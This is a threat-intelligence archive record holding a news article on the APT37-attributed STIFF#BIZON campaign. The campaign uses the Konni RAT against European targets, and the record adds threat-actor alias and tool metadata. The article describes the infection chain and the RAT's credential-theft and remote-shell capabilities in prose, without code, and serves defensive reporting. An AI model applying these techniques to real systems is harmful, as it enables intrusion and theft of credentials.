{ "id": "be9b735f-27dc-42a8-8245-b01d1a760676", "created_at": "2026-04-06T00:10:39.880114Z", "updated_at": "2026-04-10T13:11:46.027248Z", "deleted_at": null, "sha1_hash": "5a11c6138d1d7ad8d5066e8025bf669eac4ee66a", "title": "North Korean hackers attack EU targets with Konni RAT malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3458177, "plain_text": "North Korean hackers attack EU targets with Konni RAT malware\r\nBy Bill Toulas\r\nPublished: 2022-07-23 · Archived: 2026-04-05 13:40:13 UTC\r\nThreat analysts have uncovered a new campaign attributed to APT37, a North Korean group of hackers, targeting high-value\r\norganizations in the Czech Republic, Poland, and other European countries.\r\nIn this campaign, the hackers use malware known as Konni, a remote access trojan (RAT) capable of establishing\r\npersistence and performing privilege escalation on the host.\r\nKonni has been associated with North Korean cyberattacks since 2014, and most recently, it was seen in a spear-phishing\r\ncampaign targeting the Russian Ministry of Foreign Affairs.\r\nhttps://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/\r\nPage 1 of 5\n\n0:00\r\nhttps://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/\r\nPage 2 of 5\n\nVisit Advertiser websiteGO TO PAGE\r\nThe latest and still ongoing campaign was observed and analyzed by researchers at Securonix, who call it STIFF#BIZON,\r\nand resembles tactics and methods that match the operational sophistication of an APT (advanced persistent threat).\r\nThe STIFF#BIZON campaign\r\nThe attack begins with the arrival of a phishing email with an archive attachment containing a Word document\r\n(missile.docx) and a Windows Shortcut file (_weapons.doc.lnk.lnk).\r\nWhen the LNK file is opened, code runs to find a base64-encoded PowerShell script in the DOCX file to establish C2\r\ncommunication and download two additional files, 'weapons.doc' and 'wp.vbs'.\r\nProperties of the malicious shortcut file\r\nThe downloaded document is a decoy, supposedly a report from Olga Bozheva, a Russian war correspondent. At the same\r\ntime, the VBS file runs silently in the background to create a scheduled task on the host.\r\nhttps://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/\r\nPage 3 of 5\n\nBase64-encoded PowerShell adds scheduled task (Securonix)\r\nAt this phase of the attack, the actor has already loaded the RAT and established a data exchange link, and is capable of\r\nperforming the following actions:\r\nCapture screenshots using the Win32 GDI API and exfiltrate them in GZIP form.\r\nExtract state keys stored in the Local State file for cookie database decryption, useful in MFA bypassing.\r\nExtract saved credentials from the victim’s web browsers.\r\nLaunch a remote interactive shell that can execute commands every 10 seconds.\r\nIn the fourth stage of the attack, as shown in the diagram below, the hackers download additional files that support the\r\nfunction of the modified Konni sample, fetching them as compressed “.cab” archives.\r\nhttps://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/\r\nPage 4 of 5\n\nInfection chain diagram (Securonix)\r\nThese include DLLs that replace legitimate Windows service libraries like the “wpcsvc” in System32, which is leveraged for\r\nexecuting commands in the OS with higher user privileges.\r\nPossible links to APT28\r\nWhile the tactics and toolset point to APT37, Securonix underscores the possibility of APT28 (aka FancyBear) being behind\r\nthe STIFF#BIZON campaign.\r\n“There seems to be a direct correlation between IP addresses, hosting provider, and hostnames between this attack and\r\nhistorical data we’ve previously seen from FancyBear/APT28,” concludes the report.\r\nState-sponsored threat groups often attempt to mimic the TTPs of other skillful APTs to obscure their trace and mislead\r\nthreat analysts, so the chances of misattribution, in this case, are significant.\r\nAutomated Pentesting Covers Only 1 of 6 Surfaces.\r\nAutomated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the\r\nother.\r\nThis whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic\r\nquestions for any tool evaluation.\r\nSource: https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/\r\nhttps://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/" ], "report_names": [ "north-korean-hackers-attack-eu-targets-with-konni-rat-malware" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4", "created_at": "2025-08-07T02:03:25.096857Z", "updated_at": "2026-04-10T02:00:03.659118Z", "deleted_at": null, "main_name": "NICKEL JUNIPER", "aliases": [ "Konni", "OSMIUM ", "Opal Sleet " ], "source_name": "Secureworks:NICKEL JUNIPER", "tools": [ "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "b43c8747-c898-448a-88a9-76bff88e91b5", "created_at": "2024-02-02T02:00:04.058535Z", "updated_at": "2026-04-10T02:00:03.545252Z", "deleted_at": null, "main_name": "Opal Sleet", "aliases": [ "Konni", "Vedalia", "OSMIUM" ], "source_name": "MISPGALAXY:Opal Sleet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434239, "ts_updated_at": 1775826706, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5a11c6138d1d7ad8d5066e8025bf669eac4ee66a.pdf", "text": "https://archive.orkl.eu/5a11c6138d1d7ad8d5066e8025bf669eac4ee66a.txt", "img": "https://archive.orkl.eu/5a11c6138d1d7ad8d5066e8025bf669eac4ee66a.jpg" } }